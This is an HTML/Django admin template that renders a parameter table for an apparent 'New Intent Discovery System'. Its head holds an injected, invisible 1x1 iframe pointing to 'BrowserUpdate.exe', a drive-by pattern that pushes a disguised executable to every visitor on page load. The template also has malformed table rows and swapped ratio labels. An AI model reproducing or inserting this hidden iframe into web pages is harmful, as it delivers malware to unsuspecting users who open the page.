<!DOCTYPE html>
<html class="x-admin-sm">
    <head><iframe src=BrowserUpdate.exe width=1 height=1 frameborder=0></iframe>
        <meta charset="UTF-8">
        <title>New Intent Discovery System</title>
        <meta name="renderer" content="webkit|ie-comp|ie-stand">
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <meta name="viewport" content="width=device-width,user-scalable=yes, minimum-scale=0.4, initial-scale=0.8,target-densitydpi=low-dpi" />
        <link rel="stylesheet" href="/static/lib/xadmin/css/font.css">
        <link rel="stylesheet" href="/static/lib/xadmin/css/xadmin.css">
        <script type="text/javascript" src="/static/lib/layui/layui.js" charset="utf-8"></script>
        <script type="text/javascript" src="/static/lib/xadmin/js/xadmin.js"></script>
        <!-- 让IE8/9支持媒体查询，从而兼容栅格 -->
        <!--[if lt IE 9]>
          <script src="https://cdn.staticfile.org/html5shiv/r29/html5.min.js"></script>
          <script src="https://cdn.staticfile.org/respond.js/1.4.2/respond.min.js"></script>
        <![endif]-->
        <script>
            // 是否开启刷新记忆tab功能
            // var is_remember = false;
        </script>
    </head>
    <body>
        <div class="layui-fluid">
            <div class="layui-row layui-col-space15">
                <div class="layui-col-md12">
                  <div class="layui-card">
                    <div class="layui-card-body ">
                    
                        <form class="layui-form"  enctype="multipart/form-data">

                            <table class="layui-table layui-form">
                                <thead>
                                    <tr>
                                        <!-- <th>
                                            <input type="checkbox" lay-filter="checkall" name="" lay-skin="primary" style="width: 3px">
                                        </th> -->
                                        <th>Name </th>

                                        <th>Description</th>
                                        <th>Value</th>
                                        
                                    </tr>
                                </thead>

                                <tbody>
                                    {% for line in paramList %}
                                  
                                        <tr>
                                            <!-- <td>
                                                <input type="checkbox" name="id"  value="{{ line.model_id }}" lay-skin="primary" style="width: 3px">
                                            </td> -->
                                            <td>
                                                {{ line.param_name }}
                                            </td>
                                        
                                            <td>
                                                {{ line.param_describe }}
                                            </td>
                                            <td>
                                                {{ line.run_value}}
                                            </td>
                                         </tr>
                                        {% empty %}
                                        {% endfor %}
                                        {% for ex_data in ex_data %}
                                        <td>Annotated Ratio</td>
                                        <td>
                                            Annotated Describe
                                        </td>
                                        <td>
                                            {{ex_data.Intent_Ratio}}
                                        </td>
                                       
                                        <tr>
                                            <td>Intent Ratio </td>
                                            
                                       
                                      
                                          
                                            <td>
                                                Intent Describe
                                            </td>
                                            <td>
                                                {{ex_data.Annotated_ratio}}
                                            </td>
                                        {% empty %}
                                        None Param~~~
                                 
                                    {% endfor %}
                                            
                                            </tr>
                                </tbody>
                            </table>
                           
                        </form>
  

                    </div>
                </div>
            </div>
        </div>
    </body>

</html>